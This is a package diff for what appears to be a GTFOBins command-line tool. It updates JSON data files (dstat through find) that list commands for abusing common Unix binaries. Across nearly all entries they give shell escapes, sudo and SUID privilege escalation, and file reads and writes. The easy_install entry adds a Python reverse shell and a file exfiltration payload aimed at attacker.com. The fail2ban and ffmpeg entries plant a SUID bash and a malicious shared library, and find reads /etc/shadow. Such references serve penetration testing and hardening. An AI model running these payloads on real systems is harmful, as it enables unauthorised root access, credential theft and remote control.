gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/dstat.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "mkdir -p ~/.dstat\necho 'import os; os.execv(\"/bin/sh\", [\"sh\"])' >~/.dstat/dstat_xxx.py\ndstat --xxx\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "echo 'import os; os.execv(\"/bin/sh\", [\"sh\"])' >/usr/local/share/dstat/dstat_xxx.py\nsudo dstat --xxx\n"
+      }
+    ]
+  }
+}

gtfo/data/dvips.json

@@ -1,18 +1,20 @@
 {
-  "description": "The 'texput.dvi' output file produced by 'tex' can be created offline and uploaded to the target.",
   "functions": {
     "shell": [
       {
+        
         "code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\ndvips -R0 texput.dvi\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\nsudo dvips -R0 texput.dvi\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "tex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n./dvips -R0 texput.dvi\n"
       }
     ]

gtfo/data/easy_install.json

@@ -2,52 +2,55 @@
   "functions": {
     "shell": [
       {
+        
         "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\neasy_install $TF\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "TF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\neasy_install $TF\n"
+        "description": "Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\nTF=$(mktemp -d)\necho 'import sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")' > $TF/setup.py\neasy_install $TF\n"
       }
     ],
     "file-upload": [
       {
-        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. The file path must be absolute.",
-        "code": "TF=$(mktemp -d)\necho 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))' > $TF/setup.py\neasy_install $TF\n"
+        "description": "Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\nTF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))' > $TF/setup.py\neasy_install $TF\n"
       },
       {
-        "description": "Serve files in the local folder running an HTTP server. ",
-        "code": "TF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\neasy_install $TF\n"
+        "description": "Serve files in the local folder running an HTTP server.",
+        "code": "export LPORT=8888\nTF=$(mktemp -d)\necho 'import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py\neasy_install $TF\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request. The file path must be absolute.",
-        "code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', '$(whereis python)', '-c', \\\"\\\"\\\"import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve('[url]', '[file]')\\\"\\\"\\\")\" > $TF/setup.py\npip install $TF\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=/tmp/file_to_save\nTF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', '$(whereis python)', '-c', \\\"\\\"\\\"import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve('$URL', '$LFILE')\\\"\\\"\\\")\" > $TF/setup.py\npip install $TF\n"
       }
     ],
     "file-write": [
       {
         "description": "The file path must be absolute.",
-        "code": "TF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', 'python', '-c', 'open(\\\"[file]\\\",\\\"w+\\\").write(\\\"DATA\\\")')\" > $TF/setup.py\neasy_install $TF\n"
+        "code": "export LFILE=/tmp/file_to_save\nTF=$(mktemp -d)\necho \"import os;\nos.execl('$(whereis python)', 'python', '-c', 'open(\\\"$LFILE\\\",\\\"w+\\\").write(\\\"DATA\\\")')\" > $TF/setup.py\neasy_install $TF\n"
       }
     ],
     "file-read": [
       {
-        "description": "The read file content is wrapped within program messages. The file path must be absolute.",
-        "code": "TF=$(mktemp -d)\necho 'print(open(\"[file]\").read())' > $TF/setup.py\neasy_install $TF\n"
+        "description": "The read file content is wrapped within program messages.",
+        "code": "TF=$(mktemp -d)\necho 'print(open(\"file_to_read\").read())' > $TF/setup.py\neasy_install $TF\n"
       }
     ],
     "library-load": [
       {
+        
         "code": "TF=$(mktemp -d)\necho 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")' > $TF/setup.py\neasy_install $TF\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo easy_install $TF\n"
       }
     ]
   }
-}
+}

gtfo/data/eb.json

@@ -1,15 +1,16 @@
 {
-  "description": "This invokes the default logging service, which is likely to be 'journalctl', other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.",
   "functions": {
     "shell": [
       {
+        
         "code": "eb logs\n!/bin/sh\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo eb logs\n!/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/ed.json

@@ -2,31 +2,37 @@
   "functions": {
     "shell": [
       {
+        
         "code": "ed\n!/bin/sh\n"
       }
     ],
     "file-write": [
       {
-        "code": "ed [file]\na\nDATA\n.\nw\nq\n"
+        
+        "code": "ed file_to_write\na\nDATA\n.\nw\nq\n"
       }
     ],
     "file-read": [
       {
-        "code": "ed [file]\n,p\nq\n"
+        
+        "code": "ed file_to_read\n,p\nq\n"
       }
     ],
     "suid": [
       {
-        "code": "./ed [file]\n,p\nq\n"
+        
+        "code": "./ed file_to_read\n,p\nq\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo ed\n!/bin/sh\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "./ed\n!/bin/sh\n"
       }
     ]

gtfo/data/efax.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./efax -d \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo efax -d \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/elvish.json

@@ -0,0 +1,34 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "export LFILE=file_to_read\nelvish -c 'echo (slurp <$E:LFILE)'\n"
+      }
+    ],
+    "file-write": [
+      {
+        
+        "code": "export LFILE=file_to_write\nelvish -c 'echo DATA >$E:LFILE'\n"
+      }
+    ],
+    "shell": [
+      {
+        
+        "code": "elvish\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./elvish\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo elvish\n"
+      }
+    ]
+  }
+}

gtfo/data/emacs.json

@@ -2,28 +2,33 @@
   "functions": {
     "shell": [
       {
-        "code": "emacs -Q -nw --eval '(term \"/bin/sh\")'"
+        
+        "code": "emacs -Q -nw --eval '(term \"/bin/sh\")'\n"
       }
     ],
     "file-write": [
       {
-        "code": "emacs [file]\nDATA\nC-x C-s\n"
+        
+        "code": "emacs file_to_write\nDATA\nC-x C-s\n"
       }
     ],
     "file-read": [
       {
-        "code": "emacs [file]"
+        
+        "code": "emacs file_to_read\n"
       }
     ],
     "suid": [
       {
-        "code": "./emacs -Q -nw --eval '(term \"/bin/sh -p\")'"
+        
+        "code": "./emacs -Q -nw --eval '(term \"/bin/sh -p\")'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo emacs -Q -nw --eval '(term \"/bin/sh\")'"
+        
+        "code": "sudo emacs -Q -nw --eval '(term \"/bin/sh\")'\n"
       }
     ]
   }
-}
+}

gtfo/data/enscript.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "enscript /dev/null -qo /dev/null -I '/bin/sh >&2'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo enscript /dev/null -qo /dev/null -I '/bin/sh >&2'\n"
+      }
+    ]
+  }
+}

gtfo/data/env.json

@@ -2,18 +2,21 @@
   "functions": {
     "shell": [
       {
-        "code": "env /bin/sh"
+        
+        "code": "env /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./env /bin/sh -p"
+        
+        "code": "./env /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo env /bin/sh"
+        
+        "code": "sudo env /bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/eqn.json

@@ -1,20 +1,22 @@
 {
-  "description": "The content is actually parsed and corrupted by the command, thus it may not be suitable for arbitrary files.",
   "functions": {
     "file-read": [
       {
-        "code": "eqn \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\neqn \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./eqn \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./eqn \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo eqn \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo eqn \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/espeak.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nespeak -qXf \"$LFILE\"\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./espeak -qXf \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo espeak -qXf \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/ex.json

@@ -1,24 +1,32 @@
 {
-    "functions": {
-      "shell": [
-        {
-          "code": "ex\n!/bin/sh\n"
-        }
-      ],
-      "file-write": [
-        {
-          "code": "ex [file]\na\nDATA\n.\nw\nq\n"
-        }
-      ],
-      "file-read": [
-        {
-          "code": "ex [file]\n,p\nq\n"
-        }
-      ],
-      "sudo": [
-        {
-          "code": "sudo ex\n!/bin/sh\n"
-        }
-      ]
-    }
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "ex\n!/bin/sh\n"
+      }
+    ],
+    "file-write": [
+      {
+        
+        "code": "ex file_to_write\na\nDATA\n.\nw\nq\n"
+      }
+    ],
+    "file-read": [
+      {
+        
+        "code": "ex file_to_read\n,p\nq\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo ex\n!/bin/sh\n"
+      },
+      {
+        "description": "",
+        "code": "sudo ex -c ':!/bin/sh'\n"
+      }
+    ]
   }
+}

gtfo/data/exiftool.json

@@ -1,19 +1,41 @@
 {
-  "description": "If the permissions allow it, files are moved (instead of copied) to the destination.\n",
+  "description": "If the permissions allow it, files are moved (instead of copied) to the destination.",
   "functions": {
     "file-read": [
       {
-        "code": "exiftool -filename=[output] [file]\ncat [output]\n"
+        "code": "LFILE=file_to_read\nOUTPUT=output_file\nexiftool -filename=$OUTPUT $LFILE\ncat $OUTPUT"
+      },
+      {
+        "description": "Exfiltrate file data via metadata tags",
+        "code": "LFILE=file_read\nINPUT=input_file\nexiftool \"-description<=$LFILE\" --filename $INPUT"
       }
     ],
     "file-write": [
       {
-        "code": "exiftool -filename=[file] [input]\n"
+        "code": "LFILE=file_to_write\nINPUT=input_file\nexiftool -filename=$LFILE $INPUT"
+      },
+      {
+        "description": "Write file from metadata tag's content",
+        "code": "LFILE=file_to_write\nINPUT=input_file\nexiftool -description -W $LFILE --filename $INPUT"
       }
     ],
     "sudo": [
       {
-        "code": "sudo exiftool -filename=[file] [input]\n"
+        "code": "LFILE=file_to_write\nINPUT=input_file\nsudo exiftool -filename=$LFILE $INPUT"
+      }
+    ],
+    "command": [
+      {
+        "code": "COMMAND=command_to_execute\nINPUT=input_file\nexiftool -if \"system('$COMMAND');1\" --filename $INPUT"
+      },
+      {
+        "description": "Run system command and exfiltrate result via metadata tags",
+        "code": "COMMAND=command_to_execute\nINPUT=input_file\nexiftool -userparam \"inj=Test\" -if \"\\$\\$self{OPTIONS}{UserParam}{inj}=\\`$COMMAND\\`;1\" '-description<$inj' --filename $INPUT"
+      }
+    ],
+    "shell": [
+      {
+        "code": "INPUT=input_file\nexiftool -if \"system('bash')\" $INPUT"
       }
     ]
   }

gtfo/data/expand.json

@@ -1,20 +1,22 @@
 {
-  "description": "The read file content is corrupted by replacing tabs with spaces.",
   "functions": {
     "file-read": [
       {
-        "code": "expand \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nexpand \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./expand \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./expand \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo expand \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo expand \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/expect.json

@@ -1,19 +1,28 @@
 {
   "functions": {
+    "file-read": [
+      {
+        "description": "The file is read and parsed as an `expect` command file, the content of the first invalid line is returned in an error message. Thus, this might not be suitable to read arbitrary binary files.",
+        "code": "LFILE=file_to_read\nexpect $LFILE\n"
+      }
+    ],
     "shell": [
       {
-        "code": "expect -c 'spawn /bin/sh;interact'"
+        
+        "code": "expect -c 'spawn /bin/sh;interact'\n"
       }
     ],
     "suid": [
       {
-        "code": "./expect -c 'spawn /bin/sh -p;interact'"
+        
+        "code": "./expect -c 'spawn /bin/sh -p;interact'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo expect -c 'spawn /bin/sh;interact'"
+        
+        "code": "sudo expect -c 'spawn /bin/sh;interact'\n"
       }
     ]
   }
-}
+}

gtfo/data/facter.json

@@ -2,13 +2,15 @@
   "functions": {
     "shell": [
       {
+        
         "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nFACTERLIB=$TF facter\n"
       }
     ],
     "sudo": [
       {
-        "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nsudo FACTERLIB=$TF facter\n"
+        
+        "code": "TF=$(mktemp -d)\necho 'exec(\"/bin/sh\")' > $TF/x.rb\nsudo facter --custom-dir=$TF x\n"
       }
     ]
   }
-}
+}

gtfo/data/fail2ban-client.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "",
+        "code": "COMMAND=\"id\"\nsudo fail2ban-client add woot\nsudo fail2ban-client set woot addaction wootaction\nsudo fail2ban-client set woot action wootaction actionban \"$COMMAND\"\nsudo fail2ban-client start woot\nsudo fail2ban-client set woot banip 999.999.999.999\nsudo fail2ban-client set woot unbanip 999.999.999.999\nsudo fail2ban-client stop woot\n"
+      },
+      {
+        "description": "Loading tempered configuration file including code.\nRequires restarting the service.\nSince we, most likely, can't write into /etc/fail2ban/, we can copy the configuration folder to a temporary location and load this copy.\n",
+        "code": "TD_conf=$(mktemp -d)\nrsync -av /etc/fail2ban/ $TD_conf\nTD_exploit=$(mktemp -d)\ncat > $TD_exploit/exploit <<EOF\n#!/bin/sh\ncp /bin/bash $TD_exploit/bash\nchmod 755 $TD_exploit/bash\nchmod u+s $TD_exploit/bash\nEOF\nchmod +x $TD_exploit/exploit\ncat > $TD_conf/action.d/custom-start-command.conf <<EOF\n[Definition]\nactionstart = $TD_exploit/exploit\nEOF\ncat >> $TD_conf/jail.local <<EOF\n[my-custom-jail]\nenabled = true\naction = custom-start-command\nEOF\ncat > $TD_conf/filter.d/my-custom-jail.conf <<EOF\n[Definition]\nEOF\nsudo /usr/bin/fail2ban-client -c $TD_conf -v restart\n$TD_exploit/bash -p\n"
+      }
+    ]
+  }
+}

gtfo/data/ffmpeg.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "The ladspa filter loads external plugins for audio processing. Load a malicious shared library to execute code and get a shell.",
+        "code": "TD=$(mktemp -d)\nprintf \"\\x52\\x49\\x46\\x46\\x24\\x00\\x00\\x00\\x57\\x41\\x56\\x45\\x66\\x6d\\x74\\x20\\x10\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x22\\x56\\x00\\x00\\x22\\x56\\x00\\x00\\x01\\x00\\x08\\x00\\x64\\x61\\x74\\x61\\x00\\x00\\x00\\x00\" > \"$TD/any.wav\"\necho -e '#include <unistd.h>\\n#include <stdlib.h>\\n__attribute__((constructor)) static void setup(void) {\\nsetgid(0);\\nsetuid(0);\\nsystem(\"/bin/sh -c reset\");\\nsystem(\"/bin/sh\");\\n}' | gcc -x c -shared -fPIC -o $TD/libgtfo.so - \nsudo ffmpeg -i $TD/any.wav -af \"ladspa=file=$TD/libgtfo.so\" -f null a.wav\n"
+      }
+    ]
+  }
+}

gtfo/data/file.json

@@ -2,24 +2,24 @@
   "functions": {
     "file-read": [
       {
-        "description": "Each input line is treated as a filename for the 'file' command and the output is corrupted by a suffix ':' followed by the result or the error of the operation, so this may not be suitable for binary files.",
-        "code": "file -f [file]\n"
+        "description": "Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation, so this may not be suitable for binary files.",
+        "code": "LFILE=file_to_read\nfile -f $LFILE\n"
       },
       {
-        "description": "Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files. If a line in the target file begins with a '#', it will not be printed as these lines are parsed as comments. It can also be provided with a directory and will read each file in the directory.",
-        "code": "file -m [file]\n"
+        "description": "Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.\n",
+        "code": "LFILE=file_to_read\nfile -m $LFILE\n"
       }
     ],
     "suid": [
       {
-        "description": "Each input line is treated as a filename for the 'file' command and the output is corrupted by a suffix ':' followed by the result or the error of the operation, so this may not be suitable for binary files.",
-        "code": "./file -f [file]\n"
+        "description": "Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation, so this may not be suitable for binary files.",
+        "code": "LFILE=file_to_read\n./file -f $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "description": "Each input line is treated as a filename for the 'file' command and the output is corrupted by a suffix ':' followed by the result or the error of the operation, so this may not be suitable for binary files.",
-        "code": "sudo file -f [file]\n"
+        "description": "Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation, so this may not be suitable for binary files.",
+        "code": "LFILE=file_to_read\nsudo file -f $LFILE\n"
       }
     ]
   }

gtfo/data/find.json

@@ -2,18 +2,33 @@
   "functions": {
     "shell": [
       {
-        "code": "find . -exec /bin/sh \\; -quit"
+        
+        "code": "find . -exec /bin/sh \\; -quit\n"
       }
     ],
     "suid": [
       {
-        "code": "./find . -exec /bin/sh -p \\; -quit"
+        
+        "code": "./find . -exec /bin/sh -p \\; -quit\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo find . -exec /bin/sh \\; -quit"
+        
+        "code": "sudo find . -exec /bin/sh \\; -quit\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "DATA is a format string, it supports some escape sequences.",
+        "code": "LFILE=file_to_write\nfind / -fprintf \"$FILE\" DATA -quit\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "",
+        "code": "find /etc -name shadow -exec cat {} \\;\n"
       }
     ]
   }
-}
+}